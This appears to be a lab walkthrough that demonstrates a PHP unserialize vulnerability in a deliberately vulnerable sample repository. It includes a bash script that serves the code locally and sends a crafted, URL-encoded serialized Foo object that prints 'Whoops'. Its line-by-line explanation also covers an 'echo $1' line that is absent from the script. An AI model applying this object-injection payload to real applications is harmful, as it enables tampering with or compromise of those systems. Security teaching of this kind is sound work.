Unserialize

https://gitlab.com/jobertabma/vulnerable-code/-/tree/master/unserialize?ref_type=heads

Step 1: Understand the Vulnerability

In this code, a class Foo is defined with a public property $variable and a __destruct method that echoes the value of $variable. The unserialize function is used to unserialize user input from the $_GET parameter object.
The vulnerability lies in the fact that user input is directly passed to unserialize, allowing an attacker to craft a serialized object of the Foo class and modify the $variable property.

Step 2: Create and Run the Bash Script

1.Create the Bash Script: Create a file named unserialize.sh and add the provided Bash script to it.

#!/bin/bash

php -S 127.0.0.1:8080 -t unserialize &

sleep 2  

xdg-open 'http://127.0.0.1:8080/?object=O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A8%3A%22variable%22%3Bs%3A6%3A%22Whoops%22%3B%7D'

wait

- Explanation of the Script:

echo $1 > _tmp/strip
- This line writes the first argument passed to the script into a file called _tmp/strip. It seems like a placeholder and doesn't directly impact the exploitation.
php -S 127.0.0.1:8080 -t unserialize &
- This starts a PHP built-in server on 127.0.0.1 (localhost) at port 8080, serving the files in the unserialize directory. The & at the end runs this command in the background.
sleep 2
- This command pauses the execution of the script for 2 seconds to ensure the PHP server has enough time to start up before the next command is executed.
xdg-open 'http://127.0.0.1:8080/?object=O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A8%3A%22variable%22%3Bs%3A6%3A%22Whoops%22%3B%7D'
- This command uses xdg-open to open the default web browser and navigate to the specified URL.
- The URL contains the serialized object as a GET parameter: ?object=O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A8%3A%22variable%22%3Bs%3A6%3A%22Whoops%22%3B%7D.
  - The serialized string O:3:"Foo":1:{s:8:"variable";s:6:"Whoops";} is URL-encoded to ensure it is correctly transmitted as a URL parameter.
wait
- This waits for all background processes to finish before terminating the script.

2.Make the Script Executable: Change the script's permissions to make it executable.

chmod +x unserialize.sh

3. Run the script:

Expected Outcomes:

it should automatically start the PHP server, open your web browser to the crafted URL, and display the output "Whoops" in the browser, demonstrating the successful exploitation of the unserialize vulnerability.

PreviousServer-Side Template Injection (SSTI)NextCross-Site Scripting (XSS)

Last updated 1 year ago